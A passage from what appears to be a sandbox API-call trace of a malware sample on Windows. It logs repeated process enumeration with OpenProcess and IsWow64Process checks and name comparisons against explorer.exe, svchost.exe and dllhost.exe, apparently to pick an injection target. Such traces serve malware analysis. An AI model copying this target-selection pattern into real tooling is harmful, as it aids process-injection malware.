bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0228.035] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0228.035] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0228.036] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0228.036] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0228.037] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.037] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.037] CloseHandle (hObject=0xec) returned 1 [0228.037] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0228.038] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.038] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.038] CloseHandle (hObject=0xec) returned 1 [0228.038] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0228.038] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0228.039] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.039] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.039] CloseHandle (hObject=0xec) returned 1 [0228.039] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0228.039] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0228.039] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.039] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.039] CloseHandle (hObject=0xec) returned 1 [0228.039] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.040] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0228.040] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.040] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.040] CloseHandle (hObject=0xec) returned 1 [0228.040] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0228.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0228.041] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.041] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.041] CloseHandle (hObject=0xec) returned 1 [0228.041] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0228.041] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0228.041] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0228.041] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0228.042] CloseHandle (hObject=0xe8) returned 1 [0228.042] Sleep (dwMilliseconds=0x3e8) [0229.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0229.050] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0229.050] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0229.051] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0229.051] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0229.052] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0229.052] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0229.053] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0229.053] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0229.054] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0229.054] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0229.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0229.055] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0229.055] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0229.056] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0229.056] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0229.057] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0229.057] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0229.058] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0229.058] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0229.059] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0229.060] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.060] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.060] CloseHandle (hObject=0xec) returned 1 [0229.060] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0229.060] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0229.061] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.061] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.061] CloseHandle (hObject=0xec) returned 1 [0229.061] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0229.061] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0229.062] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0229.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0229.062] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.062] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.062] CloseHandle (hObject=0xec) returned 1 [0229.062] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0229.062] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0229.062] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0229.062] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0229.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0229.063] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.063] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.063] CloseHandle (hObject=0xec) returned 1 [0229.063] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0229.063] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0229.063] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0229.063] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0229.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0229.064] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.064] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.064] CloseHandle (hObject=0xec) returned 1 [0229.064] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0229.064] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0229.064] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0229.064] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0229.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0229.065] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.065] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.065] CloseHandle (hObject=0xec) returned 1 [0229.065] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0229.065] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0229.065] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0229.065] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0229.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0229.065] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.065] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.065] CloseHandle (hObject=0xec) returned 1 [0229.065] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0229.065] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0229.065] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0229.065] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0229.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0229.066] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.066] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.066] CloseHandle (hObject=0xec) returned 1 [0229.066] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0229.066] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0229.066] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0229.066] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0229.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0229.067] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.067] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.067] CloseHandle (hObject=0xec) returned 1 [0229.067] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0229.067] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0229.067] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0229.067] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0229.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0229.067] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.067] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.067] CloseHandle (hObject=0xec) returned 1 [0229.067] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0229.067] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0229.067] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0229.067] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0229.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0229.068] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.068] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.068] CloseHandle (hObject=0xec) returned 1 [0229.068] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0229.068] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0229.068] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0229.068] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0229.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0229.069] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.069] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.069] CloseHandle (hObject=0xec) returned 1 [0229.069] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0229.069] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0229.069] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0229.069] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0229.069] 